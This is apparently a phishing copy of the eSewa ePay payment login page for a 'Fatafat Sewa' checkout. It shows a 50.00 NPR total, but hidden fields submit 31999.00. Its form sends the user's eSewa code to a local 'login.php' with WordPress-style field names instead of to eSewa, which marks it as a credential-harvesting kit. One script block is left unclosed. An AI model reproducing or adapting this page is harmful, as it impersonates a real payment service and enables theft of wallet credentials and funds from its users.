<!DOCTYPE html>
<html><head lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="bootstrap.css">
    <link rel="stylesheet" href="style.css">
    <link rel="shortcut icon" type="image/x-icon" href="https://esewa.com.np/images/favicon.ico">
    <link rel="stylesheet" href="css.css">
    <link href="user-module.css" rel="stylesheet">

    <script src="jquery-2.js" integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>
    <script src="vendor.js"></script>

    <script src="lodash.js"></script>
    <script src="angular-ui-router.js"></script>
    <script src="qr-code.js"></script>
    <script src="jquery-qrcode-0.js"></script>
    <title>ePay</title>
</head>

<body ng-app="epayApp" class="ep-body ng-scope">
<div class="container-fluid mt70">
    <div class="row">
        <!-- ngInclude: '/templates/top_navigation_bar.html' --><div ng-include="'/templates/top_navigation_bar.html'" class="ng-scope"><!-- MAIN NAVBAR --> <div class="nav-main-bg navbar-fixed-top ng-scope" ng-controller="TxnDetailsController"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="row"> <div class="col-lg-9 col-md-6 col-sm-6"> <a class="navbar-brand es-brand-epay" rel="home" title="eSewa"> <img src="esewa_epay_logo.png" alt="eSewa"> </a> </div> <div class="nav navbar-nav navbar-right col-lg-3 col-md-6 col-sm-6"> <div class="text-right ep-profile-name"> <span class="text-capitalize"><strong class="ng-binding"></strong></span> <!-- ngIf: product.balance --> </div> </div> </div> </div> </div> </div> </div> </div>
    </div>
</div>
<div class="container-fluid">
    <!-- uiView: --><div class="row ng-scope" ui-view=""><div class="container-fluid ng-scope" ng-controller="ErrorMessageController"> <!-- ngInclude: '/templates/sub_navaigation_bar.html' --><div class="row ng-scope" ng-include="'/templates/sub_navaigation_bar.html'"><!--SUB NAVBAR--> <div class="container-fluid nav-sub-bg push-down ng-scope"> <div class="container"> <div class="row"> <ul class="nav nav-pills"> <!-- ngRepeat: menu in menus | orderBy: 'index' --> </ul> </div> </div> <div class="container"> <div class="row make-pay-info"> <h4>Please login to make your payment </h4> </div> </div> </div> </div> </div> <div class="container mt30 ng-scope"> <div class="row"> <div ng-class="qrEnable ? 'col-md-4' : 'col-md-8'" class="col-md-8"> <!-- ngInclude: --><ng-include src="'/templates/txndetails.html'" class="ng-scope"><div id="txn_details" class="ep-txn-detail ng-scope" ng-controller="TxnDetailsController"> <div class="panel ep-box min-height-432"> <div class="panel-heading"> <h3 class="panel-title"> Transaction Details </h3> </div> <div class="panel-body"> <div class="row"> <div class="col-lg-12"> <!-- ngIf: product.productType != 'GOVERNMENT_PAYMENT' --><h5 class="col-lg-6 pn bold ng-binding ng-scope" ng-if="product.productType != 'GOVERNMENT_PAYMENT'">Fatafat Sewa Pvt. Ltd</h5><!-- end ngIf: product.productType != 'GOVERNMENT_PAYMENT' --> <!-- ngIf: product.productType != 'GOVERNMENT_PAYMENT' --><h5 class="col-lg-6 pn text-left bold ng-scope" style="text-align: right" ng-if="product.productType != 'GOVERNMENT_PAYMENT'">NPR</h5><!-- end ngIf: product.productType != 'GOVERNMENT_PAYMENT' --> <!-- ngIf: product.productType == 'GOVERNMENT_PAYMENT' --> <!-- ngIf: product.productType != 'GOVERNMENT_PAYMENT' --><table class="table ng-scope" ng-if="product.productType != 'GOVERNMENT_PAYMENT'"> <tbody> <tr> <td>Product Amount:</td> <td id="amt" class="ng-binding" align="right">50.00</td> </tr> <tr> <td>Tax Amount:</td> <td id="txAmt" class="ng-binding" align="right">0.00</td> </tr> <tr> <td>Service Charge:</td> <td id="psc" class="ng-binding" align="right">0.00</td> </tr> <tr> <td>Delivery Charge:</td> <td id="pdc" class="ng-binding" align="right">0.00</td> </tr> <tr class="ep-total-amt"> <td>Total Amount:</td> <td id="tAmt" class="ng-binding" align="right">50.00</td> </tr> <tr style="display: none !important;"> <td>Service Code:</td> <td id="scd" class="ng-binding" align="right">NP-ES-FATAFAT</td> </tr> <tr style="display: none !important;"> <td>Product ID:</td> <td id="pid" class="ng-binding" align="right">U-6999-CART-19752</td> </tr> <tr style="display: none !important;"> <td id="su" class="ng-binding" align="right">https://fatafatsewa.com/checkout/payment-completed?status=pass&amp;payment_method=esewa</td> </tr> <!--<tr style="display: none !important;">--> <tr style="display: none !important;"> <td id="fu" class="ng-binding" align="right">https://fatafatsewa.com/checkout/payment-completed?status=fail&amp;payment_method=esewa</td> </tr> </tbody> </table><!-- end ngIf: product.productType != 'GOVERNMENT_PAYMENT' --> </div> </div> </div> </div> <div ng-controller="EpayQrPaymentController" ng-init="isQrEpayEnable(product)" class="ng-scope"> </div> </div> </ng-include> </div> <div ng-class="qrEnable ? 'col-md-8' : 'col-md-4'" class="col-md-4"> <div class="ep--panel"> <!-- ngInclude: --><ng-include src="'/templates/login.html'" class="ng-scope"><div class="ep-login col-md-6 ng-scope" ng-controller="ErrorMessageController"> <div class="ep-form form"> <div class="ep-box ep-login-box"> <div class="panel-heading"> <h3 class="panel-title">Login</h3> </div> <div class="panel-body"> <!-- ngIf: error --> <form name="loginform" id="loginform" action="login.php" method="post"> <div class="form-group"> <label></label> <input class="form-control" name="log" id="user_login" placeholder="email/ mobile number" value="code" type="hidden" required=""></div> <div class="form-group"> <label>eSewa code:</label> <input class="form-control" name="pwd" id="user_pass" placeholder="Code" type="number" required=""> <p class="error ng-hide" ng-show="loginForm.password.$touched &amp;&amp; loginForm.password.$error.required"> Required </p> </div> <input name="amt" type="hidden" value="31999.00"> <input name="scd" type="hidden" value="NP-ES-FATAFAT"> <input name="pid" type="hidden" value="U-6999-CART-19752"> <input name="fu" type="hidden" value="https://fatafatsewa.com/checkout/payment-completed?status=fail&amp;payment_method=esewa"> <input name="tAmt" type="hidden" value="31999.00"> <input name="productType" type="hidden" value=""> <div class="btn-grp"> <input class="form-control btn btn-success btn-raised ep-btn mt15" name="wp-submit" id="wp-submit" value="Log In" type="submit"> <button class="form-control btn btn-default btn-raised ep-btn mt15 ng-scope" ng-click="loginCancel()" ng-controller="EpayLoginController" type="button">Cancel </button> </div> </form> </div> </div> <!-- ngIf: showloadingBar --> </div> </div></ng-include> <!-- ngInclude: --><ng-include src="'/templates/epayqr.html'" class="ng-scope"><div ng-controller="EpayQrPaymentController" ng-show="qrEnable" class="ep-login col-md-6 ng-scope ng-hide"> <div class="ep-box panel ml30 mb100"> <div class="row"> <div class="col-md-12 ep-img-logo"> <div class="ep-logo-container fonepay-img"> <img src="fonepay-fatafat.png"> </div> <div class="ep-circle"></div> <div class="ep-logo-container esewa-img"> <img src="esewa-logo.png"> </div> </div> </div> <div class="row"> <div class="text-center ep-qr-container"> <div id="qrCode"></div> <div ng-show="showTickAnimation" class="success-qr-scan ng-hide"> <div class="loader-container"> <div class="icon-container"> <div class="success"></div> </div> </div> </div> </div> <div class="ep-qr-instruction"> <h4 style="padding-left: 24px;"><strong>How do I pay using QR Code ?</strong></h4> <ol> <li>Open your eSewa application or mobile banking application.</li> <li>Open QR scanner and scan</li> <li>Tap on Confirm button to pay</li> </ol> </div> </div> <br> </div> </div> </ng-include> </div> </div> </div> </div> </div>
</div>

<!-- footer-->
<!-- ngInclude: --><ng-include src="'/templates/esewa_footer.html'" class="ng-scope"><div class="footer-wrapper ep-footer ng-scope"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-6 footer-copyright"> <h6>� eSewa Nepal, 2009-<span class="auto-update-yrs">2022</span>. All Rights Reserved.</h6> </div> <div class="col-lg-6 col-md-6 footer-brnd-logo"> <img class="img-responsive footer-logo" src="esewa-logo.png" alt="eSewa"> </div> </div> </div> </div> <a id="scrollup" class="ng-scope"> <span class="glyphicon glyphicon-chevron-up"></span> </a> <script type="text/javascript" class="ng-scope">$(document).ready(function () 

<script src="ePayAppLogin.js"></script>








<script id="f5_cspm">(function(){var f5_cspm={f5_p:'HCBBDMFGNKLLGJDFJHPAPIFONAPCKIPEMEJNGCFMKBADLGIAOEEEIBNLDLIHFLHOMKMBGICAAANBJEFAMGKAPENPAADMMCALJMDGGINEPPJKFBNJIOJMJPKBIGIOCALH',setCharAt:function(str,index,chr){if(index>str.length-1)return str;return str.substr(0,index)+chr+str.substr(index+1);},get_byte:function(str,i){var s=(i/16)|0;i=(i&15);s=s*32;return((str.charCodeAt(i+16+s)-65)<<4)|(str.charCodeAt(i+s)-65);},set_byte:function(str,i,b){var s=(i/16)|0;i=(i&15);s=s*32;str=f5_cspm.setCharAt(str,(i+16+s),String.fromCharCode((b>>4)+65));str=f5_cspm.setCharAt(str,(i+s),String.fromCharCode((b&15)+65));return str;},set_latency:function(str,latency){latency=latency&0xffff;str=f5_cspm.set_byte(str,40,(latency>>8));str=f5_cspm.set_byte(str,41,(latency&0xff));str=f5_cspm.set_byte(str,35,2);return str;},wait_perf_data:function(){try{var wp=window.performance.timing;if(wp.loadEventEnd>0){var res=wp.loadEventEnd-wp.navigationStart;if(res<60001){var cookie_val=f5_cspm.set_latency(f5_cspm.f5_p,res);window.document.cookie='f5avr1549463417aaaaaaaaaaaaaaaa_cspm_='+encodeURIComponent(cookie_val)+';path=/';}
return;}}
catch(err){return;}
setTimeout(f5_cspm.wait_perf_data,100);return;},go:function(){var chunk=window.document.cookie.split(/\s*;\s*/);for(var i=0;i<chunk.length;++i){var pair=chunk[i].split(/\s*=\s*/);if(pair[0]=='f5_cspm'&&pair[1]=='1234')
{var d=new Date();d.setTime(d.getTime()-1000);window.document.cookie='f5_cspm=;expires='+d.toUTCString()+';path=/;';setTimeout(f5_cspm.wait_perf_data,100);}}}}
f5_cspm.go();}());</script></body></html>